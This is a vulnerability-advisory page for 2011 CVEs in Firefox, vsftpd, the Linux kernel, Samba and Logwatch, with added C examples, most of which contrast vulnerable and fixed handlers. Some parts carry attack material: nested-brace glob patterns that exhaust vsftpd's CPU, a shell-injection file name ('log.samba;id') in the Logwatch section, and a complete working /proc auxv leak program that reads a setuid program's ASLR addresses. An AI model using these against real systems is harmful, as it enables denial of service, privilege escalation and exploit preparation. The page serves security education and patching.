The Vigil@nce team watches public vulnerabilities impacting your computers, and then offers security solutions, a database and tools to fix them.

Computer vulnerabilities of Debian Squeeze

vulnerability bulletin CVE-2010-1585 CVE-2011-0051 CVE-2011-0053

Firefox, SeaMonkey: several vulnerabilities

Synthesis of the vulnerability

Several vulnerabilities of Firefox and SeaMonkey can be used by an attacker to execute code on the victim's computer.
Impacted products: Debian, Fedora, Mandriva Linux, Firefox, SeaMonkey, OpenSolaris, openSUSE, Solaris, RHEL, Slackware, SLES.
Severity: 4/4.
Consequences: user access/rights.
Provenance: document.
Number of vulnerabilities in this bulletin: 10.
Creation date: 02/03/2011.
Identifiers: 558531, 558541, 558633, 562547, 563243, 563618, 569384, 573873, 576649, 596232, 599610, 600853, 600974, 602115, 605672, 607160, 610601, 613376, 614499, 615657, 616009, 616659, 619255, 622015, 626631, BID-46368, BID-46643, BID-46645, BID-46647, BID-46648, BID-46650, BID-46651, BID-46652, BID-46660, BID-46661, BID-46663, CERTA-2011-AVI-127, CVE-2010-1585, CVE-2011-0051, CVE-2011-0053, CVE-2011-0054, CVE-2011-0055, CVE-2011-0056, CVE-2011-0057, CVE-2011-0058, CVE-2011-0059, CVE-2011-0061, CVE-2011-0062, DSA-2180-1, DSA-2186-1, DSA-2186-2, DSA-2187-1, FEDORA-2011-2796, FEDORA-2011-2797, MDVSA-2011:041, MFSA 2011-01, MFSA 2011-02, MFSA 2011-03, MFSA 2011-04, MFSA 2011-05, MFSA 2011-06, MFSA 2011-07, MFSA 2011-08, MFSA 2011-09, MFSA 2011-10, openSUSE-SU-2011:0169-1, openSUSE-SU-2014:1100-1, RHSA-2011:0310-01, RHSA-2011:0313-01, SSA:2011-060-01, SSA:2011-068-01, SSA:2011-068-02, SUSE-SA:2011:013, VIGILANCE-VUL-10413, ZDI-11-103.

Description of the vulnerability

Several vulnerabilities were announced in Firefox and SeaMonkey.

An attacker can trigger several memory corruptions, leading to code execution. [severity:4/4; 558531, 558541, 558633, 563243, 563618, 569384, 576649, 596232, 599610, 600853, 600974, 602115, 605672, 613376, 614499, BID-46645, BID-46647, CVE-2011-0053, CVE-2011-0062, MFSA 2011-01]

An attacker can call the eval() function recursively, in order to force confirm dialog windows to be accepted. [severity:4/4; 616659, BID-46643, CVE-2011-0051, MFSA 2011-02]

The JSON.stringify() function can use a freed memory area (use-after-free), which leads to code execution. [severity:4/4; 616009, 619255, BID-46661, CVE-2011-0055, MFSA 2011-03, ZDI-11-103]

An attacker can use non-local JavaScript variables, in order to create a buffer overflow in upvarMap. [severity:4/4; 615657, BID-46648, CVE-2011-0054, MFSA 2011-04]

An attacker can use a JavaScript program with more than 64k string variables, in order to create a buffer overflow in the atom map. [severity:4/4; 622015, BID-46650, CVE-2011-0056, MFSA 2011-05]

A JavaScript Worker can use a freed memory area (use-after-free), which leads to code execution. [severity:4/4; 626631, BID-46663, CVE-2011-0057, MFSA 2011-06]

An attacker can insert very long strings in an HTML document, in order to corrupt memory. [severity:4/4; 607160, BID-46660, CVE-2011-0058, MFSA 2011-07]

The ParanoidFragmentSink class does not filter "javascript:" URLs in chrome documents. [severity:2/4; 562547, CERTA-2011-AVI-127, CVE-2010-1585, MFSA 2011-08]

A malicious JPEG image corrupts memory. [severity:4/4; 610601, BID-46651, CVE-2011-0061, MFSA 2011-09]

An attacker can use an HTTP 307 redirect, which forwards custom request headers to the new destination, in order to perform a Cross Site Request Forgery. [severity:3/4; 573873, BID-46652, CVE-2011-0059, MFSA 2011-10]

The most severe vulnerabilities lead to code execution.
Full Vigil@nce bulletin... (Free trial)

computer vulnerability CVE-2011-0762

vsftpd: denial of service via a pattern

Synthesis of the vulnerability

An attacker can use a special file name, in order to force vsftpd to consume a lot of processor resources.
Impacted products: Debian, Fedora, Mandriva Linux, openSUSE, RHEL, SLES, vsftpd.
Severity: 3/4.
Consequences: denial of service on service.
Provenance: internet client.
Creation date: 16/02/2011.
Revision date: 01/03/2011.
Identifiers: BID-46617, CVE-2011-0762, DSA-2305-1, FEDORA-2011-2590, FEDORA-2011-2615, MDVSA-2011:049, openSUSE-SU-2011:0435-1, RHSA-2011:0337-01, SUSE-SR:2011:009, VIGILANCE-VUL-10375, VU#590604.

Description of the vulnerability

A vsftpd client can pass a glob pattern (a file name filter with wildcards and brace alternatives, not a full regular expression) in order to search file names. For example:
  LIST file*.txt

However, a pattern that nests brace groups and wildcards can be constructed so that the matcher recurses deeply and backtracks through a huge number of alternatives. For example:
  LIST {{*},...}
  LIST {{*},{{*},...}}
  LIST {{*},{{*},{{*},...}}}
  etc.

An attacker can therefore use a special file name, in order to force vsftpd to consume a lot of processor resources.
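The following is an added example, not vsftpd's own code: a small recursive glob matcher supporting `*`, `?` and nested `{a,b}` groups, in the unbounded form that mirrors the bug class above and in a hardened form that refuses a pattern once the matcher has done more than a fixed amount of work (the same idea as the upstream fix; the limit value, the helper names and the constructed pathological pattern are assumptions of this example, not taken from vsftpd).

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MATCH_STEP_LIMIT 1000   /* assumed budget; vsftpd's fix uses its own constant */

typedef struct {
    unsigned long steps;   /* matcher invocations so far */
    unsigned long limit;   /* 0 = unlimited (the unfixed behaviour) */
    bool exhausted;        /* budget ran out: pattern rejected */
} match_ctx;

/* Index of the '}' closing the group opened at pat[0] == '{' (nesting aware). */
static const char *brace_end(const char *pat) {
    int depth = 0;
    for (const char *p = pat; *p; p++) {
        if (*p == '{') depth++;
        else if (*p == '}' && --depth == 0) return p;
    }
    return NULL;
}

static bool do_match(match_ctx *c, const char *pat, const char *name);

/* '*' matches any prefix of name: try every split point (this is the backtracking). */
static bool match_star(match_ctx *c, const char *after_star, const char *name) {
    for (const char *n = name; ; n++) {
        if (do_match(c, after_star, n)) return true;
        if (c->exhausted || *n == '\0') return false;
    }
}

/* {alt1,alt2,...}rest: try each alternative spliced in front of rest. */
static bool match_brace(match_ctx *c, const char *pat, const char *name) {
    const char *end = brace_end(pat);
    if (!end) return false;                      /* unbalanced '{': no match */
    const char *rest = end + 1, *alt = pat + 1;
    while (alt <= end) {
        int depth = 0;
        const char *p = alt;
        while (p < end && !(depth == 0 && *p == ',')) {   /* end of this alternative */
            if (*p == '{') depth++; else if (*p == '}') depth--;
            p++;
        }
        char buf[512];
        size_t alen = (size_t)(p - alt), rlen = strlen(rest);
        if (alen + rlen >= sizeof buf) return false;
        memcpy(buf, alt, alen);
        memcpy(buf + alen, rest, rlen + 1);
        if (do_match(c, buf, name)) return true;
        if (c->exhausted) return false;
        alt = p + 1;
    }
    return false;
}

static bool do_match(match_ctx *c, const char *pat, const char *name) {
    c->steps++;
    if (c->limit && c->steps > c->limit) { c->exhausted = true; return false; }
    for (;;) {
        switch (*pat) {
        case '\0': return *name == '\0';
        case '*':  while (pat[1] == '*') pat++; return match_star(c, pat + 1, name);
        case '{':  return match_brace(c, pat, name);
        case '?':  if (*name == '\0') return false; pat++; name++; break;
        default:   if (*pat != *name) return false; pat++; name++; break;
        }
    }
}

/* Unfixed behaviour: no budget. *steps receives the work performed. */
bool glob_match_unbounded(const char *pat, const char *name, unsigned long *steps) {
    match_ctx c = { 0, 0, false };
    bool r = do_match(&c, pat, name);
    if (steps) *steps = c.steps;
    return r;
}

/* Hardened: 1 = match, 0 = no match, -1 = pattern rejected (budget exhausted). */
int glob_match_bounded(const char *pat, const char *name, unsigned long *steps) {
    match_ctx c = { 0, MATCH_STEP_LIMIT, false };
    bool r = do_match(&c, pat, name);
    if (steps) *steps = c.steps;
    return c.exhausted ? -1 : (r ? 1 : 0);
}

/* Constructed attacker pattern: "*" then 'groups' copies of "{*,*}" then "x".
 * Against a long name without 'x' every alternative backtracks through every split. */
void build_pathological(char *out, size_t outsz, int groups) {
    if ((size_t)(5 * groups + 3) > outsz) { out[0] = '\0'; return; }
    strcpy(out, "*");
    for (int i = 0; i < groups; i++) strcat(out, "{*,*}");
    strcat(out, "x");
}

int main(void) {
    char pat[64]; unsigned long steps;
    build_pathological(pat, sizeof pat, 3);
    glob_match_unbounded(pat, "aaaaaaaaaaaaaaaaaaaa", &steps);
    printf("%s: %lu steps unbounded, bounded result %d\n", pat, steps,
           glob_match_bounded(pat, "aaaaaaaaaaaaaaaaaaaa", NULL));
    return 0;
}
```

Adding one more `{*,*}` group multiplies the work by roughly the name length again, which is why a step budget (rather than a pattern-length limit) is the right control: the cost depends on how the pattern and the directory's file names interact, not on the pattern's size.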

This vulnerability is different from VIGILANCE-VUL-10010.

vulnerability CVE-2011-1080

Linux kernel: memory reading via ebtables

Synthesis of the vulnerability

A local attacker with the CAP_NET_ADMIN capability can replace an ebtables rule, in order to read the memory or to create a denial of service.
Impacted products: Debian, Linux, openSUSE, RHEL, SUSE Linux Enterprise Desktop, SLES, ESX.
Severity: 1/4.
Consequences: data reading, denial of service on server.
Provenance: user shell.
Creation date: 01/03/2011.
Identifiers: BID-46616, CVE-2011-1080, DSA-2240-1, DSA-2264-1, openSUSE-SU-2012:0236-1, RHSA-2011:0498-01, RHSA-2011:0500-01, RHSA-2011:0833-01, SUSE-SA:2011:031, SUSE-SU-2011:0832-1, VIGILANCE-VUL-10410.

Description of the vulnerability

When Linux acts as an Ethernet bridge, the network administrator can use the ebtables firewall tool to define filtering rules.

The do_replace() function of the net/bridge/netfilter/ebtables.c file replaces a table. However, it does not ensure that the table name copied from user space is NUL-terminated. String functions then keep reading kernel memory past the end of the field, until they find a null byte or reach an unmapped page (which crashes the kernel). The resulting string is passed to try_then_request_module(), hence to the modprobe command as an argument, where it can be read via the ps command.

A local attacker with the CAP_NET_ADMIN capability can therefore replace an ebtables rule, in order to read the memory or to create a denial of service.

computer vulnerability note CVE-2011-1079

Linux kernel: denial of service via bluetooth bnep

Synthesis of the vulnerability

A local attacker with the CAP_NET_ADMIN capability can use an ioctl on a Bluetooth BNEP socket, in order to read the memory or to create a denial of service.
Impacted products: Debian, Fedora, Linux, RHEL, SUSE Linux Enterprise Desktop, SLES, ESX.
Severity: 1/4.
Consequences: data reading, denial of service on server.
Provenance: user shell.
Creation date: 01/03/2011.
Identifiers: BID-46616, CVE-2011-1079, DSA-2240-1, DSA-2264-1, FEDORA-2011-6447, FEDORA-2011-6541, RHSA-2011:0498-01, RHSA-2011:0500-01, RHSA-2011:0833-01, SUSE-SA:2011:031, SUSE-SU-2011:0832-1, VIGILANCE-VUL-10409.

Description of the vulnerability

The BNEP (Bluetooth Network Encapsulation Protocol) protocol carries Ethernet (and thus IP) packets over L2CAP (Logical Link Control and Adaptation Protocol).

The bnep_sock_ioctl() function of the net/bluetooth/bnep/sock.c file implements ioctls on BNEP sockets. However, it does not ensure that the device name in the request copied from user space is NUL-terminated. String functions then keep reading and copying kernel memory past the end of the field, until they find a null byte or reach an unmapped page (which crashes the kernel).

A local attacker with the CAP_NET_ADMIN capability can therefore use an ioctl on a Bluetooth BNEP socket, in order to read the memory or to create a denial of service.
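Both this bulletin and the ebtables one above describe the same defect: a fixed-size name copied from user space is used as a C string without forcing a terminator. The block below is an added example (not kernel code) that models it with a hypothetical request layout and a stand-in "stack frame"; the struct names, field sizes and the STACK-SECRET neighbour are constructed for the demonstration. The scan it performs is bounded by the frame so the demo is itself memory-safe, whereas the unfixed kernel code read on until it found a NUL or faulted.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define NAME_MAX_LEN 16   /* an IFNAMSIZ-sized field (assumed layout) */

/* Hypothetical request, shaped like the BNEP connadd and ebtables replace
 * requests: a fixed-size name followed by other fields. */
struct name_req {
    char name[NAME_MAX_LEN];
    unsigned char other[48];
};

/* Stand-in for the kernel stack around the copied request: whatever sits
 * after the struct is what an unterminated name leaks. */
struct kernel_frame {
    struct name_req req;
    char neighbour[32];
};

/* Bytes a "%s" conversion would consume starting at frame->req.name, i.e.
 * the length of the string handed to request_module()/modprobe. Bounded by
 * the frame size so this demo never reads outside its own object. */
size_t bytes_percent_s_would_read(const struct kernel_frame *frame) {
    const char *p = (const char *)frame;
    size_t n = 0;
    while (n < sizeof *frame && p[n] != '\0') n++;
    return n;
}

/* Unfixed handler: copies the user request and trusts the name as-is. */
size_t handle_unfixed(const unsigned char *user, size_t len, struct kernel_frame *frame) {
    if (len < sizeof frame->req) return (size_t)-1;
    memcpy(&frame->req, user, sizeof frame->req);   /* copy_from_user() stand-in */
    return bytes_percent_s_would_read(frame);
}

/* Fixed handler: force NUL termination before any string use. */
size_t handle_fixed(const unsigned char *user, size_t len, struct kernel_frame *frame) {
    if (len < sizeof frame->req) return (size_t)-1;
    memcpy(&frame->req, user, sizeof frame->req);
    frame->req.name[NAME_MAX_LEN - 1] = '\0';
    return bytes_percent_s_would_read(frame);
}

/* Constructed hostile request: every byte non-zero, so no terminator anywhere. */
void build_hostile_request(unsigned char *buf, size_t len) { memset(buf, 'A', len); }

/* Constructed frame whose neighbour holds data the caller must not see. */
void init_frame(struct kernel_frame *frame) {
    memset(frame, 0, sizeof *frame);
    strcpy(frame->neighbour, "STACK-SECRET");
}

int main(void) {
    struct kernel_frame frame;
    unsigned char user[sizeof(struct name_req)];
    build_hostile_request(user, sizeof user);
    init_frame(&frame);
    printf("unfixed: \"%%s\" reads %zu bytes from a %d-byte name field\n",
           handle_unfixed(user, sizeof user, &frame), NAME_MAX_LEN);
    init_frame(&frame);
    printf("fixed:   \"%%s\" reads %zu bytes\n", handle_fixed(user, sizeof user, &frame));
    return 0;
}
```

The unfixed handler returns 76 bytes: the whole 64-byte request plus the 12-byte neighbour, which is exactly the content that ends up in modprobe's argv. With the terminator forced, the string stops at 15 bytes regardless of what user space supplied.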

computer vulnerability bulletin CVE-2011-1078

Linux kernel: memory reading via bluetooth sco

Synthesis of the vulnerability

A local attacker can query a Bluetooth socket, in order to read one byte coming from the kernel memory.
Impacted products: Debian, Linux, RHEL, SUSE Linux Enterprise Desktop, SLES, ESX.
Severity: 1/4.
Consequences: data reading.
Provenance: user shell.
Creation date: 01/03/2011.
Identifiers: BID-46616, CVE-2011-1078, DSA-2240-1, DSA-2264-1, RHSA-2011:0500-01, RHSA-2011:0833-01, RHSA-2012:1156-01, SUSE-SA:2011:031, SUSE-SU-2011:0832-1, VIGILANCE-VUL-10408.

Description of the vulnerability

The net/bluetooth/sco.c file implements the support of Bluetooth SCO (Synchronous Connection Oriented) used for voice.

The getsockopt() function returns information about a socket to the user. The sco_sock_getsockopt_old() function generates this information for Bluetooth SCO sockets.

However, sco_sock_getsockopt_old() does not initialize one byte of the sco_conninfo structure it copies to user space: the structure has a trailing padding byte that no field assignment ever writes, so it keeps whatever the kernel stack previously held.

A local attacker can therefore query a Bluetooth socket, in order to read one byte coming from the kernel memory.
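As an added example (not the kernel's code), the block below models the leak with a structure shaped like sco_conninfo, a "stack slot" pre-filled with stale bytes so the padding has a known leftover value, and the unfixed and fixed getsockopt handlers side by side. The union, the 0xAA fill and the helper names are constructions of this example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Modelled on the kernel's struct sco_conninfo: a 16-bit connection handle
 * followed by a 3-byte device class. Alignment pads it to 6 bytes, so the
 * last byte is padding that no field ever writes. */
struct sco_conninfo {
    uint16_t hci_handle;
    uint8_t  dev_class[3];
};

/* Number of padding bytes the compiler inserted (1 on common ABIs). */
size_t sco_conninfo_padding(void) {
    return sizeof(struct sco_conninfo) - (sizeof(uint16_t) + 3);
}

/* Stand-in for the stack memory where the handler's local 'cinfo' lives;
 * 'raw' lets the demo pre-fill it with stale bytes, as a real stack is. */
union stack_slot {
    struct sco_conninfo cinfo;
    unsigned char raw[sizeof(struct sco_conninfo)];
};

/* Unfixed handler: sets the fields, then copies the whole object out,
 * padding included. 'user' must hold sizeof(struct sco_conninfo) bytes. */
void getsockopt_unfixed(union stack_slot *slot, uint16_t handle,
                        const uint8_t cls[3], unsigned char *user) {
    slot->cinfo.hci_handle = handle;
    memcpy(slot->cinfo.dev_class, cls, 3);
    memcpy(user, &slot->cinfo, sizeof slot->cinfo);   /* copy_to_user() stand-in */
}

/* Fixed handler: zero the whole object first so no stale byte can escape. */
void getsockopt_fixed(union stack_slot *slot, uint16_t handle,
                      const uint8_t cls[3], unsigned char *user) {
    memset(&slot->cinfo, 0, sizeof slot->cinfo);
    slot->cinfo.hci_handle = handle;
    memcpy(slot->cinfo.dev_class, cls, 3);
    memcpy(user, &slot->cinfo, sizeof slot->cinfo);
}

/* Runs one handler over a slot pre-filled with 0xAA (stale stack contents)
 * and returns the byte the caller received in the padding position. */
unsigned char leaked_padding_byte(int fixed) {
    union stack_slot slot;
    unsigned char user[sizeof(struct sco_conninfo)];
    const uint8_t cls[3] = { 0x04, 0x02, 0x24 };
    memset(slot.raw, 0xAA, sizeof slot.raw);
    if (fixed) getsockopt_fixed(&slot, 0x0042, cls, user);
    else       getsockopt_unfixed(&slot, 0x0042, cls, user);
    return user[sizeof(struct sco_conninfo) - 1];
}

int main(void) {
    printf("padding bytes: %zu\n", sco_conninfo_padding());
    printf("unfixed leaks 0x%02x, fixed returns 0x%02x\n",
           leaked_padding_byte(0), leaked_padding_byte(1));
    return 0;
}
```

One byte per call looks harmless, but the caller chooses when to call, and the stale byte comes from whatever kernel path ran last on that stack, so repeated queries can sample pointers and other stack contents a byte at a time.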

computer vulnerability CVE-2011-0719

Samba: memory corruption via FD_SET

Synthesis of the vulnerability

An attacker can open several files on a Samba share, in order to stop the service, and possibly to execute code.
Impacted products: Debian, Fedora, HP-UX, Mandriva Linux, openSUSE, Solaris, RHEL, Samba, Slackware, SLES.
Severity: 2/4.
Consequences: user access/rights, denial of service on service.
Provenance: intranet client.
Creation date: 28/02/2011.
Identifiers: 670431, 7949, BID-46597, c02787667, CERTA-2011-AVI-120, CVE-2011-0719, DSA-2175-1, FEDORA-2011-3118, FEDORA-2011-3120, HPSBUX02657, MDVSA-2011:038, openSUSE-SU-2011:0403-1, RHSA-2011:0305-01, RHSA-2011:0306-01, SSA:2011-059-01, SSRT100460, SUSE-SR:2011:008, VIGILANCE-VUL-10405.

Description of the vulnerability

The select() system call monitors events (read/write) on a list of file descriptors (a "fd_set").

A fd_set is a bit array with room for FD_SETSIZE descriptors. The FD_SET(fd, &the_fd_set) macro indicates that the file descriptor number "fd" has to be monitored in a fd_set; to do so, it sets the bit at index fd of the array.

An application which uses FD_SET() has to check that the descriptor number is non-negative and less than FD_SETSIZE (otherwise FD_SET sets a bit outside the array). However, several Samba functions do not do this check. The error case occurs when many files are open at once (fd >= FD_SETSIZE) or when an open operation failed (fd == -1).

An attacker can therefore open several files on a Samba share, in order to stop the service, and possibly to execute code.
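An added example, not Samba's code, showing the check that was missing: a wrapper around FD_SET() that refuses both triggers named above, a failed open() (fd == -1) and a descriptor beyond FD_SETSIZE, together with the byte index a raw FD_SET() would have written to. The helper names and the nonexistent path are constructions of this example.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/select.h>
#include <unistd.h>

/* Unfixed pattern (shown only as a comment; never run it with a bad fd):
 *     FD_SET(fd, &set);   // fd == -1 or fd >= FD_SETSIZE writes outside 'set'
 *
 * Checked wrapper: 0 on success, -1 with errno = EBADF if fd does not fit. */
int safe_fd_set(int fd, fd_set *set) {
    if (fd < 0 || fd >= FD_SETSIZE) { errno = EBADF; return -1; }
    FD_SET(fd, set);
    return 0;
}

/* Byte of the fd_set a raw FD_SET(fd) would touch; -1 for a negative fd.
 * Any value >= sizeof(fd_set) is an out-of-bounds write. */
long fd_set_byte_index(int fd) {
    return fd < 0 ? -1L : (long)(fd / 8);
}

/* Reproduces the two triggers from the bulletin and returns how many of the
 * attempted registrations the checked wrapper rejected (expected: 3). */
int demo_rejections(void) {
    fd_set set;
    int rejected = 0;
    FD_ZERO(&set);
    int bad = open("/nonexistent/dir/file.log", O_RDONLY);   /* fails: -1 */
    if (safe_fd_set(bad, &set) < 0) rejected++;
    if (safe_fd_set(FD_SETSIZE, &set) < 0) rejected++;        /* one past the end */
    if (safe_fd_set(FD_SETSIZE + 5, &set) < 0) rejected++;
    if (safe_fd_set(STDIN_FILENO, &set) < 0) rejected++;      /* in range: accepted */
    return rejected;
}

int main(void) {
    printf("FD_SETSIZE=%d, sizeof(fd_set)=%zu, FD_SET(%d) would hit byte %ld\n",
           FD_SETSIZE, sizeof(fd_set), FD_SETSIZE, fd_set_byte_index(FD_SETSIZE));
    printf("rejected: %d of 4\n", demo_rejections());
    return 0;
}
```

A daemon that serves many clients from one process will eventually hand out descriptor numbers above FD_SETSIZE, so the durable fix is to stop using select() for such descriptors (poll() or epoll have no fixed ceiling); until then, every FD_SET() needs this guard.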

vulnerability announce CVE-2011-1018

Logwatch: code execution via a file name

Synthesis of the vulnerability

An attacker can create a log file with a special name, in order to force Logwatch to execute malicious code with root privileges.
Impacted products: Debian, Fedora, openSUSE, RHEL, SLES, Unix (platform) ~ not comprehensive.
Severity: 2/4.
Consequences: administrator access/rights.
Provenance: user shell.
Creation date: 25/02/2011.
Identifiers: 3184223, CERTA-2011-AVI-163, CVE-2011-1018, DSA-2182-1, FEDORA-2011-2318, FEDORA-2011-2328, openSUSE-SU-2011:0242-1, RHSA-2011:0324-01, SUSE-SR:2011:005, VIGILANCE-VUL-10402.

Description of the vulnerability

The Logwatch program analyzes system log files, in order to report errors and notable events.

The logwatch.pl script executes, with root privileges, a shell command containing the log file name:
  cat log_file ...
However, the file name is not filtered before being inserted in the shell command. An attacker can thus put shell metacharacters in the name (such as ';', '`' or '$(...)') in order to execute another shell command.

In order to exploit this vulnerability, the attacker has to create a new log file under a directory Logwatch reads. For example, the Samba server creates log files named after the connecting user or machine.

An attacker can therefore create a log file with a special name, in order to force Logwatch to execute malicious code with root privileges.
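The following is an added example written for this page, not Logwatch's code: the unfixed pattern (splicing the file name into a shell command line, shown only to make the injected command visible), an allow-list check for a log file name, and the fixed pattern, which runs cat through execvp() with the path as a single argv element so no shell ever parses it. The function names and the sample names are constructions of this example.

```c
#define _GNU_SOURCE
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Unfixed pattern: the log name is spliced into a shell command line, which
 * is what lets "; id" or "$(id)" in a file name run as a command. Returns
 * the line the shell would receive, so the injection can be inspected. */
int build_shell_command(const char *logfile, char *out, size_t outsz) {
    int n = snprintf(out, outsz, "cat %s", logfile);
    return (n < 0 || (size_t)n >= outsz) ? -1 : 0;
}

/* Allow-list for a log file name: one path component made of
 * [A-Za-z0-9._-], not starting with '-' (would be parsed as an option)
 * and not "." or "..". Anything a shell treats specially is rejected. */
int is_safe_log_name(const char *name) {
    if (name == NULL || name[0] == '\0' || name[0] == '-') return 0;
    if (strcmp(name, ".") == 0 || strcmp(name, "..") == 0) return 0;
    for (const char *p = name; *p; p++) {
        unsigned char c = (unsigned char)*p;
        if (!isalnum(c) && c != '.' && c != '_' && c != '-') return 0;
    }
    return 1;
}

/* Fixed pattern: validate the name, then exec cat directly with the path
 * as one argv element. Returns cat's exit status (0 on success), or -1 if
 * the name was rejected or the child could not be run. Output is discarded. */
int cat_log_without_shell(const char *dir, const char *name) {
    char path[4096];
    if (!is_safe_log_name(name)) return -1;
    if (snprintf(path, sizeof path, "%s/%s", dir, name) >= (int)sizeof path) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *argv[] = { "cat", "--", path, NULL };   /* "--": path is never an option */
        freopen("/dev/null", "w", stdout);
        freopen("/dev/null", "w", stderr);
        execvp("cat", argv);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) {
    char cmd[128];
    build_shell_command("log.samba;id", cmd, sizeof cmd);
    printf("shell would run: %s\n", cmd);                         /* cat log.samba;id */
    printf("safe name? %d, rejected by exec path: %d\n",
           is_safe_log_name("log.samba;id"), cat_log_without_shell("/dev", "null;id"));
    return 0;
}
```

The allow-list is the second line of defence; the first is not going through a shell at all. Quoting or escaping the name for the shell is brittle (every shell has its own rules), whereas an argv element is passed to cat byte for byte.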

vulnerability CVE-2011-1020

Linux kernel: information disclosure on a setuid

Synthesis of the vulnerability

A local attacker can read a file on /proc, in order to obtain information on a setuid program.
Impacted products: Debian, Linux, openSUSE, RHEL, SUSE Linux Enterprise Desktop, SLES, ESX.
Severity: 1/4.
Consequences: data reading.
Provenance: user shell.
Creation date: 25/02/2011.
Identifiers: BID-46567, CERTA-2003-AVI-005, CERTA-2012-AVI-479, CVE-2011-1020, DSA-2303-1, DSA-2303-2, DSA-2310-1, ESX400-201209001, ESX400-201209401-SG, ESX400-201209402-SG, ESX400-201209404-SG, ESX410-201208101-SG, ESX410-201208102-SG, ESX410-201208103-SG, ESX410-201208104-SG, ESX410-201208105-SG, ESX410-201208106-SG, ESX410-201208107-SG, openSUSE-SU-2011:0860-1, openSUSE-SU-2011:0861-1, RHSA-2011:1253-01, RHSA-2011:1530-03, RHSA-2012:0007-01, RHSA-2012:0116-01, SUSE-SA:2011:031, SUSE-SU-2011:0832-1, SUSE-SU-2011:1150-1, VIGILANCE-VUL-10400, VMSA-2012-0003.1, VMSA-2012-0005.2, VMSA-2012-0005.3, VMSA-2012-0008.1, VMSA-2012-0013, VMSA-2012-0013.1.

Description of the vulnerability

Functions of the exec() family replace the current process by a new process.

Files located under the /proc/[pid]/ directory contain information about the process. For example, the /proc/[pid]/auxv file contains the auxiliary vector passed to the ELF interpreter, including the load addresses of the interpreter and the vDSO, which reveal the process's ASLR layout.

An attacker can:
 - create a process
 - open its auxv file
 - use exec() to replace the process by a suid program
 - read the auxv file (he is allowed because the permission check was done when the file was opened, before the exec)
The content of the auxv file then describes the suid program.

A local attacker can therefore read a file on /proc, in order to obtain information on a setuid program. This vulnerability can for example be used to bypass ASLR.
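As an added example (not the bulletin's code), the block below carries out the four steps above: the parent forks a child, opens /proc/[child]/auxv while the child is still waiting, releases the child so it exec()s the program given on the command line, and then reads the already-open descriptor and decodes the entries that matter for ASLR. The pipe-based handshake, the fixed sleep and the helper names are constructions of this example; on a kernel with the fix, the read after the exec is refused.

```c
#define _GNU_SOURCE
#include <elf.h>
#include <fcntl.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

#ifndef AT_SYSINFO_EHDR
#define AT_SYSINFO_EHDR 33   /* vDSO base; not defined by every libc */
#endif

/* Look up one entry in a raw auxv image: an array of {type, value} pairs
 * of unsigned long, terminated by AT_NULL. Returns 1 and stores the value
 * if found, 0 otherwise (entries after AT_NULL are ignored). */
int auxv_lookup(const unsigned char *buf, size_t len, unsigned long type,
                unsigned long *value) {
    const size_t entry = 2 * sizeof(unsigned long);
    for (size_t off = 0; off + entry <= len; off += entry) {
        unsigned long t, v;
        memcpy(&t, buf + off, sizeof t);
        memcpy(&v, buf + off + sizeof t, sizeof v);
        if (t == AT_NULL) break;
        if (t == type) { *value = v; return 1; }
    }
    return 0;
}

/* Read an auxv file through an already-open descriptor.
 * Returns the number of bytes read, or -1 on error. */
ssize_t auxv_read(int fd, unsigned char *buf, size_t bufsz) {
    size_t total = 0;
    while (total < bufsz) {
        ssize_t n = read(fd, buf + total, bufsz - total);
        if (n < 0) return -1;
        if (n == 0) break;
        total += (size_t)n;
    }
    return (ssize_t)total;
}

int main(int argc, char **argv) {
    if (argc < 2) { fprintf(stderr, "usage: %s /path/to/setuid-program [args]\n", argv[0]); return 2; }
    int go[2];
    if (pipe(go) < 0) { perror("pipe"); return 1; }
    pid_t pid = fork();
    if (pid < 0) { perror("fork"); return 1; }
    if (pid == 0) {                                   /* step 1: the process to be replaced */
        char c;
        close(go[1]);
        if (read(go[0], &c, 1) != 1) _exit(1);        /* wait until the parent has opened auxv */
        close(go[0]);
        execv(argv[1], argv + 1);                     /* step 3: become the suid program */
        perror("execv"); _exit(1);
    }
    close(go[0]);
    char path[64];
    snprintf(path, sizeof path, "/proc/%ld/auxv", (long)pid);
    int fd = open(path, O_RDONLY);                    /* step 2: permission check happens here */
    if (fd < 0) { perror("open"); kill(pid, SIGKILL); return 1; }
    if (write(go[1], "x", 1) != 1) { perror("write"); kill(pid, SIGKILL); return 1; }
    close(go[1]);
    usleep(200000);                                   /* crude: give the exec time to happen */

    unsigned char buf[4096];                          /* step 4: read through the old descriptor */
    ssize_t n = auxv_read(fd, buf, sizeof buf);
    if (n < 0) perror("read after exec (refused on a fixed kernel)");
    else {
        unsigned long v;
        if (auxv_lookup(buf, (size_t)n, AT_BASE, &v))         printf("AT_BASE (interpreter): %#lx\n", v);
        if (auxv_lookup(buf, (size_t)n, AT_SYSINFO_EHDR, &v)) printf("AT_SYSINFO_EHDR (vDSO): %#lx\n", v);
        if (auxv_lookup(buf, (size_t)n, AT_RANDOM, &v))       printf("AT_RANDOM (canary seed): %#lx\n", v);
    }
    kill(pid, SIGKILL);
    waitpid(pid, NULL, 0);
    return 0;
}
```

The target must still be running when the read happens (a program that waits for input is convenient), which is why the example kills it afterwards. The values printed are the ones an exploit for a memory-corruption bug in the suid program would otherwise have to guess.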

computer vulnerability bulletin CVE-2011-1016

Linux kernel: memory write via Radeon R300

Synthesis of the vulnerability

When the system has a Radeon R300 video device, a local attacker can send an AARESOLVE_OFFSET message, in order to write to the memory.
Impacted products: Debian, Linux, openSUSE, RHEL, SUSE Linux Enterprise Desktop, SLES.
Severity: 1/4.
Consequences: data creation/edition.
Provenance: user shell.
Creation date: 24/02/2011.
